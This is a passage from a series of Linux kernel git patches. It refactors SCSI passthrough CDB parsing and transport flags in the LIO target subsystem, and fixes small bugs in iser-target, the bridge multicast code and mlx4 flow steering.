-commands are presented to userspace, and the rest are handled by LIO's -in-kernel command emulation. The commands presented are all versions -of: - -READ -WRITE -WRITE_VERIFY -XDWRITEREAD -WRITE_SAME -COMPARE_AND_WRITE -SYNCHRONIZE_CACHE -UNMAP - - A final note ------------ diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 0e0feeaec39c..90e084ea7b92 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -938,12 +938,13 @@ static void tcmu_free_device(struct se_device *dev) } enum { - Opt_dev_config, Opt_dev_size, Opt_err, + Opt_dev_config, Opt_dev_size, Opt_hw_block_size, Opt_err, }; static match_table_t tokens = { {Opt_dev_config, "dev_config=%s"}, {Opt_dev_size, "dev_size=%u"}, + {Opt_hw_block_size, "hw_block_size=%u"}, {Opt_err, NULL} }; @@ -954,6 +955,7 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, char *orig, *ptr, *opts, *arg_p; substring_t args[MAX_OPT_ARGS]; int ret = 0, token; + unsigned long tmp_ul; opts = kstrdup(page, GFP_KERNEL); if (!opts) @@ -986,6 +988,24 @@ static ssize_t tcmu_set_configfs_dev_params(struct se_device *dev, if (ret < 0) pr_err("kstrtoul() failed for dev_size=\n"); break; + case Opt_hw_block_size: + arg_p = match_strdup(&args[0]); + if (!arg_p) { + ret = -ENOMEM; + break; + } + ret = kstrtoul(arg_p, 0, &tmp_ul); + kfree(arg_p); + if (ret < 0) { + pr_err("kstrtoul() failed for hw_block_size=\n"); + break; + } + if (!tmp_ul) { + pr_err("hw_block_size must be nonzero\n"); + break; + } + dev->dev_attrib.hw_block_size = tmp_ul; + break; default: break; } @@ -1016,12 +1036,9 @@ static sector_t tcmu_get_blocks(struct se_device *dev) } static sense_reason_t -tcmu_execute_rw(struct se_cmd *se_cmd, struct scatterlist *sgl, u32 sgl_nents, - enum dma_data_direction data_direction) +tcmu_pass_op(struct se_cmd *se_cmd) { - int ret; - - ret = tcmu_queue_cmd(se_cmd); + int ret = tcmu_queue_cmd(se_cmd); if (ret != 0) return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; @@ -1030,62 +1047,69 @@ tcmu_execute_rw(struct se_cmd *se_cmd, struct scatterlist *sgl, u32 sgl_nents, } static sense_reason_t -tcmu_pass_op(struct se_cmd *se_cmd) +tcmu_parse_cdb(struct se_cmd *cmd) { - int ret = tcmu_queue_cmd(se_cmd); + unsigned char *cdb = cmd->t_task_cdb; - if (ret != 0) - return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; - else + /* + * For REPORT LUNS we always need to emulate the response, for everything + * else, pass it up. + */ + if (cdb[0] == REPORT_LUNS) { + cmd->execute_cmd = spc_emulate_report_luns; return TCM_NO_SENSE; -} + } -static struct sbc_ops tcmu_sbc_ops = { - .execute_rw = tcmu_execute_rw, - .execute_sync_cache = tcmu_pass_op, - .execute_write_same = tcmu_pass_op, - .execute_write_same_unmap = tcmu_pass_op, - .execute_unmap = tcmu_pass_op, -}; + /* Set DATA_CDB flag for ops that should have it */ + switch (cdb[0]) { + case READ_6: + case READ_10: + case READ_12: + case READ_16: + case WRITE_6: + case WRITE_10: + case WRITE_12: + case WRITE_16: + case WRITE_VERIFY: + case WRITE_VERIFY_12: + case 0x8e: /* WRITE_VERIFY_16 */ + case COMPARE_AND_WRITE: + case XDWRITEREAD_10: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + case VARIABLE_LENGTH_CMD: + switch (get_unaligned_be16(&cdb[8])) { + case READ_32: + case WRITE_32: + case 0x0c: /* WRITE_VERIFY_32 */ + case XDWRITEREAD_32: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + } + } -static sense_reason_t -tcmu_parse_cdb(struct se_cmd *cmd) -{ - return sbc_parse_cdb(cmd, &tcmu_sbc_ops); + cmd->execute_cmd = tcmu_pass_op; + + return TCM_NO_SENSE; } -DEF_TB_DEFAULT_ATTRIBS(tcmu); +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_pi_prot_type); +TB_DEV_ATTR_RO(tcmu, hw_pi_prot_type); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_block_size); +TB_DEV_ATTR_RO(tcmu, hw_block_size); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_max_sectors); +TB_DEV_ATTR_RO(tcmu, hw_max_sectors); + +DEF_TB_DEV_ATTRIB_RO(tcmu, hw_queue_depth); +TB_DEV_ATTR_RO(tcmu, hw_queue_depth); static struct configfs_attribute *tcmu_backend_dev_attrs[] = { - &tcmu_dev_attrib_emulate_model_alias.attr, - &tcmu_dev_attrib_emulate_dpo.attr, - &tcmu_dev_attrib_emulate_fua_write.attr, - &tcmu_dev_attrib_emulate_fua_read.attr, - &tcmu_dev_attrib_emulate_write_cache.attr, - &tcmu_dev_attrib_emulate_ua_intlck_ctrl.attr, - &tcmu_dev_attrib_emulate_tas.attr, - &tcmu_dev_attrib_emulate_tpu.attr, - &tcmu_dev_attrib_emulate_tpws.attr, - &tcmu_dev_attrib_emulate_caw.attr, - &tcmu_dev_attrib_emulate_3pc.attr, - &tcmu_dev_attrib_pi_prot_type.attr, &tcmu_dev_attrib_hw_pi_prot_type.attr, - &tcmu_dev_attrib_pi_prot_format.attr, - &tcmu_dev_attrib_enforce_pr_isids.attr, - &tcmu_dev_attrib_is_nonrot.attr, - &tcmu_dev_attrib_emulate_rest_reord.attr, - &tcmu_dev_attrib_force_pr_aptpl.attr, &tcmu_dev_attrib_hw_block_size.attr, - &tcmu_dev_attrib_block_size.attr, &tcmu_dev_attrib_hw_max_sectors.attr, - &tcmu_dev_attrib_optimal_sectors.attr, &tcmu_dev_attrib_hw_queue_depth.attr, - &tcmu_dev_attrib_queue_depth.attr, - &tcmu_dev_attrib_max_unmap_lba_count.attr, - &tcmu_dev_attrib_max_unmap_block_desc_count.attr, - &tcmu_dev_attrib_unmap_granularity.attr, - &tcmu_dev_attrib_unmap_granularity_alignment.attr, - &tcmu_dev_attrib_max_write_same_len.attr, NULL, }; @@ -1094,7 +1118,7 @@ static struct se_subsystem_api tcmu_template = { .inquiry_prod = "USER", .inquiry_rev = TCMU_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, + .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, .attach_hba = tcmu_attach_hba, .detach_hba = tcmu_detach_hba, .alloc_device = tcmu_alloc_device, From 7bfea53b5c936d706d0bf60ec218fa72cde77121 Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:40 -0700 Subject: [PATCH 507/872] target: Move passthrough CDB parsing into a common function Aside from whether they handle BIDI ops or not, parsing of the CDB by kernel and user SCSI passthrough modules should be identical. Move this into a new passthrough_parse_cdb() and call it from tcm-pscsi and tcm-user. Reported-by: Christoph Hellwig Reviewed-by: Ilias Tsitsimpis Signed-off-by: Andy Grover Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_device.c | 74 ++++++++++++++++++++++++++++ drivers/target/target_core_pscsi.c | 53 +------------------- drivers/target/target_core_user.c | 43 +--------------- include/target/target_core_backend.h | 2 + 4 files changed, 78 insertions(+), 94 deletions(-) diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c index 7faa6aef9a4d..56b20dc54087 100644 --- a/drivers/target/target_core_device.c +++ b/drivers/target/target_core_device.c @@ -33,6 +33,7 @@ #include #include #include +#include #include #include #include @@ -1707,3 +1708,76 @@ void core_dev_release_virtual_lun0(void) target_free_device(g_lun0_dev); core_delete_hba(hba); } + +/* + * Common CDB parsing for kernel and user passthrough. + */ +sense_reason_t +passthrough_parse_cdb(struct se_cmd *cmd, + sense_reason_t (*exec_cmd)(struct se_cmd *cmd)) +{ + unsigned char *cdb = cmd->t_task_cdb; + + /* + * Clear a lun set in the cdb if the initiator talking to use spoke + * and old standards version, as we can't assume the underlying device + * won't choke up on it. + */ + switch (cdb[0]) { + case READ_10: /* SBC - RDProtect */ + case READ_12: /* SBC - RDProtect */ + case READ_16: /* SBC - RDProtect */ + case SEND_DIAGNOSTIC: /* SPC - SELF-TEST Code */ + case VERIFY: /* SBC - VRProtect */ + case VERIFY_16: /* SBC - VRProtect */ + case WRITE_VERIFY: /* SBC - VRProtect */ + case WRITE_VERIFY_12: /* SBC - VRProtect */ + case MAINTENANCE_IN: /* SPC - Parameter Data Format for SA RTPG */ + break; + default: + cdb[1] &= 0x1f; /* clear logical unit number */ + break; + } + + /* + * For REPORT LUNS we always need to emulate the response, for everything + * else, pass it up. + */ + if (cdb[0] == REPORT_LUNS) { + cmd->execute_cmd = spc_emulate_report_luns; + return TCM_NO_SENSE; + } + + /* Set DATA_CDB flag for ops that should have it */ + switch (cdb[0]) { + case READ_6: + case READ_10: + case READ_12: + case READ_16: + case WRITE_6: + case WRITE_10: + case WRITE_12: + case WRITE_16: + case WRITE_VERIFY: + case WRITE_VERIFY_12: + case 0x8e: /* WRITE_VERIFY_16 */ + case COMPARE_AND_WRITE: + case XDWRITEREAD_10: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + case VARIABLE_LENGTH_CMD: + switch (get_unaligned_be16(&cdb[8])) { + case READ_32: + case WRITE_32: + case 0x0c: /* WRITE_VERIFY_32 */ + case XDWRITEREAD_32: + cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; + break; + } + } + + cmd->execute_cmd = exec_cmd; + + return TCM_NO_SENSE; +} +EXPORT_SYMBOL(passthrough_parse_cdb); diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index 4073869d2090..53bd0eb57095 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -973,64 +973,13 @@ pscsi_map_sg(struct se_cmd *cmd, struct scatterlist *sgl, u32 sgl_nents, return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; } -/* - * Clear a lun set in the cdb if the initiator talking to use spoke - * and old standards version, as we can't assume the underlying device - * won't choke up on it. - */ -static inline void pscsi_clear_cdb_lun(unsigned char *cdb) -{ - switch (cdb[0]) { - case READ_10: /* SBC - RDProtect */ - case READ_12: /* SBC - RDProtect */ - case READ_16: /* SBC - RDProtect */ - case SEND_DIAGNOSTIC: /* SPC - SELF-TEST Code */ - case VERIFY: /* SBC - VRProtect */ - case VERIFY_16: /* SBC - VRProtect */ - case WRITE_VERIFY: /* SBC - VRProtect */ - case WRITE_VERIFY_12: /* SBC - VRProtect */ - case MAINTENANCE_IN: /* SPC - Parameter Data Format for SA RTPG */ - break; - default: - cdb[1] &= 0x1f; /* clear logical unit number */ - break; - } -} - static sense_reason_t pscsi_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - if (cmd->se_cmd_flags & SCF_BIDI) return TCM_UNSUPPORTED_SCSI_OPCODE; - pscsi_clear_cdb_lun(cdb); - - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else the default for pSCSI is to pass the command to the underlying - * LLD / physical hardware. - */ - switch (cdb[0]) { - case REPORT_LUNS: - cmd->execute_cmd = spc_emulate_report_luns; - return 0; - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - /* FALLTHROUGH*/ - default: - cmd->execute_cmd = pscsi_execute_cmd; - return 0; - } + return passthrough_parse_cdb(cmd, pscsi_execute_cmd); } static sense_reason_t diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 90e084ea7b92..2768ea2cfd7a 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -1049,48 +1049,7 @@ tcmu_pass_op(struct se_cmd *se_cmd) static sense_reason_t tcmu_parse_cdb(struct se_cmd *cmd) { - unsigned char *cdb = cmd->t_task_cdb; - - /* - * For REPORT LUNS we always need to emulate the response, for everything - * else, pass it up. - */ - if (cdb[0] == REPORT_LUNS) { - cmd->execute_cmd = spc_emulate_report_luns; - return TCM_NO_SENSE; - } - - /* Set DATA_CDB flag for ops that should have it */ - switch (cdb[0]) { - case READ_6: - case READ_10: - case READ_12: - case READ_16: - case WRITE_6: - case WRITE_10: - case WRITE_12: - case WRITE_16: - case WRITE_VERIFY: - case WRITE_VERIFY_12: - case 0x8e: /* WRITE_VERIFY_16 */ - case COMPARE_AND_WRITE: - case XDWRITEREAD_10: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - break; - case VARIABLE_LENGTH_CMD: - switch (get_unaligned_be16(&cdb[8])) { - case READ_32: - case WRITE_32: - case 0x0c: /* WRITE_VERIFY_32 */ - case XDWRITEREAD_32: - cmd->se_cmd_flags |= SCF_SCSI_DATA_CDB; - break; - } - } - - cmd->execute_cmd = tcmu_pass_op; - - return TCM_NO_SENSE; + return passthrough_parse_cdb(cmd, tcmu_pass_op); } DEF_TB_DEV_ATTRIB_RO(tcmu, hw_pi_prot_type); diff --git a/include/target/target_core_backend.h b/include/target/target_core_backend.h index d61be7297b2c..563e11970152 100644 --- a/include/target/target_core_backend.h +++ b/include/target/target_core_backend.h @@ -138,5 +138,7 @@ int se_dev_set_queue_depth(struct se_device *, u32); int se_dev_set_max_sectors(struct se_device *, u32); int se_dev_set_optimal_sectors(struct se_device *, u32); int se_dev_set_block_size(struct se_device *, u32); +sense_reason_t passthrough_parse_cdb(struct se_cmd *cmd, + sense_reason_t (*exec_cmd)(struct se_cmd *cmd)); #endif /* TARGET_CORE_BACKEND_H */ From a3541703ebbf99d499656b15987175f6579b42ac Mon Sep 17 00:00:00 2001 From: Andy Grover Date: Tue, 19 May 2015 14:44:41 -0700 Subject: [PATCH 508/872] target: Use a PASSTHROUGH flag instead of transport_types It seems like we only care if a transport is passthrough or not. Convert transport_type to a flags field and replace TRANSPORT_PLUGIN_* with a flag, TRANSPORT_FLAG_PASSTHROUGH. Signed-off-by: Andy Grover Reviewed-by: Ilias Tsitsimpis Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_alua.c | 4 ++-- drivers/target/target_core_configfs.c | 10 +++++----- drivers/target/target_core_device.c | 4 ++-- drivers/target/target_core_file.c | 1 - drivers/target/target_core_iblock.c | 1 - drivers/target/target_core_pr.c | 2 +- drivers/target/target_core_pscsi.c | 2 +- drivers/target/target_core_rd.c | 1 - drivers/target/target_core_transport.c | 6 +++--- drivers/target/target_core_user.c | 2 +- include/target/target_core_backend.h | 6 ++---- 11 files changed, 17 insertions(+), 22 deletions(-) diff --git a/drivers/target/target_core_alua.c b/drivers/target/target_core_alua.c index 75cbde1f7c5b..4f8d4d459aa4 100644 --- a/drivers/target/target_core_alua.c +++ b/drivers/target/target_core_alua.c @@ -704,7 +704,7 @@ target_alua_state_check(struct se_cmd *cmd) if (dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE) return 0; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (!port) @@ -2377,7 +2377,7 @@ ssize_t core_alua_store_secondary_write_metadata( int core_setup_alua(struct se_device *dev) { - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV && + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) && !(dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE)) { struct t10_alua_lu_gp_member *lu_gp_mem; diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c index 1580077971f8..e7b0430a0575 100644 --- a/drivers/target/target_core_configfs.c +++ b/drivers/target/target_core_configfs.c @@ -811,7 +811,7 @@ static ssize_t target_core_dev_pr_show_attr_res_holder(struct se_device *dev, { int ret; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return sprintf(page, "Passthrough\n"); spin_lock(&dev->dev_reservation_lock); @@ -962,7 +962,7 @@ SE_DEV_PR_ATTR_RO(res_pr_type); static ssize_t target_core_dev_pr_show_attr_res_type( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return sprintf(page, "SPC_PASSTHROUGH\n"); else if (dev->dev_reservation_flags & DRF_SPC2_RESERVATIONS) return sprintf(page, "SPC2_RESERVATIONS\n"); @@ -975,7 +975,7 @@ SE_DEV_PR_ATTR_RO(res_type); static ssize_t target_core_dev_pr_show_attr_res_aptpl_active( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; return sprintf(page, "APTPL Bit Status: %s\n", @@ -990,7 +990,7 @@ SE_DEV_PR_ATTR_RO(res_aptpl_active); static ssize_t target_core_dev_pr_show_attr_res_aptpl_metadata( struct se_device *dev, char *page) { - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; return sprintf(page, "Ready to process PR APTPL metadata..\n"); @@ -1037,7 +1037,7 @@ static ssize_t target_core_dev_pr_store_attr_res_aptpl_metadata( u16 port_rpti = 0, tpgt = 0; u8 type = 0, scope; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (dev->dev_reservation_flags & DRF_SPC2_RESERVATIONS) return 0; diff --git a/drivers/target/target_core_device.c b/drivers/target/target_core_device.c index 56b20dc54087..ce5f768181ff 100644 --- a/drivers/target/target_core_device.c +++ b/drivers/target/target_core_device.c @@ -528,7 +528,7 @@ static void core_export_port( list_add_tail(&port->sep_list, &dev->dev_sep_list); spin_unlock(&dev->se_port_lock); - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV && + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) && !(dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE)) { tg_pt_gp_mem = core_alua_allocate_tg_pt_gp_mem(port); if (IS_ERR(tg_pt_gp_mem) || !tg_pt_gp_mem) { @@ -1604,7 +1604,7 @@ int target_configure_device(struct se_device *dev) * anything virtual (IBLOCK, FILEIO, RAMDISK), but not for TCM/pSCSI * passthrough because this is being provided by the backend LLD. */ - if (dev->transport->transport_type != TRANSPORT_PLUGIN_PHBA_PDEV) { + if (!(dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH)) { strncpy(&dev->t10_wwn.vendor[0], "LIO-ORG", 8); strncpy(&dev->t10_wwn.model[0], dev->transport->inquiry_prod, 16); diff --git a/drivers/target/target_core_file.c b/drivers/target/target_core_file.c index f7e6e51aed36..3f27bfd816d8 100644 --- a/drivers/target/target_core_file.c +++ b/drivers/target/target_core_file.c @@ -958,7 +958,6 @@ static struct se_subsystem_api fileio_template = { .inquiry_prod = "FILEIO", .inquiry_rev = FD_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, .attach_hba = fd_attach_hba, .detach_hba = fd_detach_hba, .alloc_device = fd_alloc_device, diff --git a/drivers/target/target_core_iblock.c b/drivers/target/target_core_iblock.c index 1b7947c2510f..8c965683789f 100644 --- a/drivers/target/target_core_iblock.c +++ b/drivers/target/target_core_iblock.c @@ -904,7 +904,6 @@ static struct se_subsystem_api iblock_template = { .inquiry_prod = "IBLOCK", .inquiry_rev = IBLOCK_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_VHBA_PDEV, .attach_hba = iblock_attach_hba, .detach_hba = iblock_detach_hba, .alloc_device = iblock_alloc_device, diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c index b7c81acf08d0..a15411c79ae9 100644 --- a/drivers/target/target_core_pr.c +++ b/drivers/target/target_core_pr.c @@ -4093,7 +4093,7 @@ target_check_reservation(struct se_cmd *cmd) return 0; if (dev->se_hba->hba_flags & HBA_FLAGS_INTERNAL_USE) return 0; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; spin_lock(&dev->dev_reservation_lock); diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c index 53bd0eb57095..ecc5eaef13d6 100644 --- a/drivers/target/target_core_pscsi.c +++ b/drivers/target/target_core_pscsi.c @@ -1141,7 +1141,7 @@ static struct configfs_attribute *pscsi_backend_dev_attrs[] = { static struct se_subsystem_api pscsi_template = { .name = "pscsi", .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, + .transport_flags = TRANSPORT_FLAG_PASSTHROUGH, .attach_hba = pscsi_attach_hba, .detach_hba = pscsi_detach_hba, .pmode_enable_hba = pscsi_pmode_enable_hba, diff --git a/drivers/target/target_core_rd.c b/drivers/target/target_core_rd.c index a263bf5fab8d..d16489b6a1a4 100644 --- a/drivers/target/target_core_rd.c +++ b/drivers/target/target_core_rd.c @@ -733,7 +733,6 @@ static struct se_subsystem_api rd_mcp_template = { .name = "rd_mcp", .inquiry_prod = "RAMDISK-MCP", .inquiry_rev = RD_MCP_VERSION, - .transport_type = TRANSPORT_PLUGIN_VHBA_VDEV, .attach_hba = rd_attach_hba, .detach_hba = rd_detach_hba, .alloc_device = rd_alloc_device, diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 90c92f04a586..675f2d9d1f14 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1196,7 +1196,7 @@ transport_check_alloc_task_attr(struct se_cmd *cmd) * Check if SAM Task Attribute emulation is enabled for this * struct se_device storage object */ - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return 0; if (cmd->sam_task_attr == TCM_ACA_TAG) { @@ -1787,7 +1787,7 @@ static bool target_handle_task_attr(struct se_cmd *cmd) { struct se_device *dev = cmd->se_dev; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return false; /* @@ -1912,7 +1912,7 @@ static void transport_complete_task_attr(struct se_cmd *cmd) { struct se_device *dev = cmd->se_dev; - if (dev->transport->transport_type == TRANSPORT_PLUGIN_PHBA_PDEV) + if (dev->transport->transport_flags & TRANSPORT_FLAG_PASSTHROUGH) return; if (cmd->sam_task_attr == TCM_SIMPLE_TAG) { diff --git a/drivers/target/target_core_user.c b/drivers/target/target_core_user.c index 2768ea2cfd7a..07d2996d8c1f 100644 --- a/drivers/target/target_core_user.c +++ b/drivers/target/target_core_user.c @@ -1077,7 +1077,7 @@ static struct se_subsystem_api tcmu_template = { .inquiry_prod = "USER", .inquiry_rev = TCMU_VERSION, .owner = THIS_MODULE, - .transport_type = TRANSPORT_PLUGIN_PHBA_PDEV, + .transport_flags = TRANSPORT_FLAG_PASSTHROUGH, .attach_hba = tcmu_attach_hba, .detach_hba = tcmu_detach_hba, .alloc_device = tcmu_alloc_device, diff --git a/include/target/target_core_backend.h b/include/target/target_core_backend.h index 563e11970152..5f1225706993 100644 --- a/include/target/target_core_backend.h +++ b/include/target/target_core_backend.h @@ -1,9 +1,7 @@ #ifndef TARGET_CORE_BACKEND_H #define TARGET_CORE_BACKEND_H -#define TRANSPORT_PLUGIN_PHBA_PDEV 1 -#define TRANSPORT_PLUGIN_VHBA_PDEV 2 -#define TRANSPORT_PLUGIN_VHBA_VDEV 3 +#define TRANSPORT_FLAG_PASSTHROUGH 1 struct target_backend_cits { struct config_item_type tb_dev_cit; @@ -22,7 +20,7 @@ struct se_subsystem_api { char inquiry_rev[4]; struct module *owner; - u8 transport_type; + u8 transport_flags; int (*attach_hba)(struct se_hba *, u32); void (*detach_hba)(struct se_hba *); From b2feda4feb1b0ea74c0916b4a35b038bbfef9c82 Mon Sep 17 00:00:00 2001 From: Roland Dreier Date: Fri, 29 May 2015 23:12:10 -0700 Subject: [PATCH 509/872] iser-target: Fix error path in isert_create_pi_ctx() We don't assign pi_ctx to desc->pi_ctx until we're certain to succeed in the function. That means the cleanup path should use the local pi_ctx variable, not desc->pi_ctx. This was detected by Coverity (CID 1260062). Signed-off-by: Roland Dreier Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 327529ee85eb..3f40319a55da 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -547,11 +547,11 @@ isert_create_pi_ctx(struct fast_reg_descriptor *desc, return 0; err_prot_mr: - ib_dereg_mr(desc->pi_ctx->prot_mr); + ib_dereg_mr(pi_ctx->prot_mr); err_prot_frpl: - ib_free_fast_reg_page_list(desc->pi_ctx->prot_frpl); + ib_free_fast_reg_page_list(pi_ctx->prot_frpl); err_pi_ctx: - kfree(desc->pi_ctx); + kfree(pi_ctx); return ret; } From 71d9f6149cac8fc6646adfb2a6f3b0de6ddd23f6 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 28 May 2015 04:42:54 -0700 Subject: [PATCH 510/872] bridge: fix br_multicast_query_expired() bug MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit br_multicast_query_expired() querier argument is a pointer to a struct bridge_mcast_querier : struct bridge_mcast_querier { struct br_ip addr; struct net_bridge_port __rcu *port; }; Intent of the code was to clear port field, not the pointer to querier. Fixes: 2cd4143192e8 ("bridge: memorize and export selected IGMP/MLD querier port") Signed-off-by: Eric Dumazet Acked-by: Thadeu Lima de Souza Cascardo Acked-by: Linus Lüssing Cc: Linus Lüssing Cc: Steinar H. Gunderson Signed-off-by: David S. Miller --- net/bridge/br_multicast.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c index a3abe6ed111e..22fd0419b314 100644 --- a/net/bridge/br_multicast.c +++ b/net/bridge/br_multicast.c @@ -1822,7 +1822,7 @@ static void br_multicast_query_expired(struct net_bridge *br, if (query->startup_sent < br->multicast_startup_query_count) query->startup_sent++; - RCU_INIT_POINTER(querier, NULL); + RCU_INIT_POINTER(querier->port, NULL); br_multicast_send_query(br, NULL, query); spin_unlock(&br->multicast_lock); } From 48564135cba806bd0d6d1704c0ea317318966d9f Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:15 +0300 Subject: [PATCH 511/872] net/mlx4_core: Demote simple multicast and broadcast flow steering rules In SRIOV, when simple (i.e - Ethernet L2 only) flow steering rules are created, always create them at MLX4_DOMAIN_NIC priority (instead of the real priority the function created them at). This is done in order to let multiple functions add broadcast/multicast rules without affecting other functions, which is necessary for DPDK in SRIOV. Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx4/main.c | 4 ++-- .../ethernet/mellanox/mlx4/resource_tracker.c | 23 +++++++++++++++++++ 2 files changed, 25 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/hw/mlx4/main.c b/drivers/infiniband/hw/mlx4/main.c index cc64400d41ac..8c96c71e7bab 100644 --- a/drivers/infiniband/hw/mlx4/main.c +++ b/drivers/infiniband/hw/mlx4/main.c @@ -1090,7 +1090,7 @@ static int __mlx4_ib_create_flow(struct ib_qp *qp, struct ib_flow_attr *flow_att ret = mlx4_cmd_imm(mdev->dev, mailbox->dma, reg_id, size >> 2, 0, MLX4_QP_FLOW_STEERING_ATTACH, MLX4_CMD_TIME_CLASS_A, - MLX4_CMD_NATIVE); + MLX4_CMD_WRAPPED); if (ret == -ENOMEM) pr_err("mcg table is full. Fail to register network rule.\n"); else if (ret == -ENXIO) @@ -1107,7 +1107,7 @@ static int __mlx4_ib_destroy_flow(struct mlx4_dev *dev, u64 reg_id) int err; err = mlx4_cmd(dev, reg_id, 0, 0, MLX4_QP_FLOW_STEERING_DETACH, MLX4_CMD_TIME_CLASS_A, - MLX4_CMD_NATIVE); + MLX4_CMD_WRAPPED); if (err) pr_err("Fail to detach network rule. registration id = 0x%llx\n", reg_id); diff --git a/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c b/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c index 15ec08181658..ab48386bfefc 100644 --- a/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c +++ b/drivers/net/ethernet/mellanox/mlx4/resource_tracker.c @@ -3973,6 +3973,22 @@ static int validate_eth_header_mac(int slave, struct _rule_hw *eth_header, return 0; } +static void handle_eth_header_mcast_prio(struct mlx4_net_trans_rule_hw_ctrl *ctrl, + struct _rule_hw *eth_header) +{ + if (is_multicast_ether_addr(eth_header->eth.dst_mac) || + is_broadcast_ether_addr(eth_header->eth.dst_mac)) { + struct mlx4_net_trans_rule_hw_eth *eth = + (struct mlx4_net_trans_rule_hw_eth *)eth_header; + struct _rule_hw *next_rule = (struct _rule_hw *)(eth + 1); + bool last_rule = next_rule->size == 0 && next_rule->id == 0 && + next_rule->rsvd == 0; + + if (last_rule) + ctrl->prio = cpu_to_be16(MLX4_DOMAIN_NIC); + } +} + /* * In case of missing eth header, append eth header with a MAC address * assigned to the VF. @@ -4125,6 +4141,12 @@ int 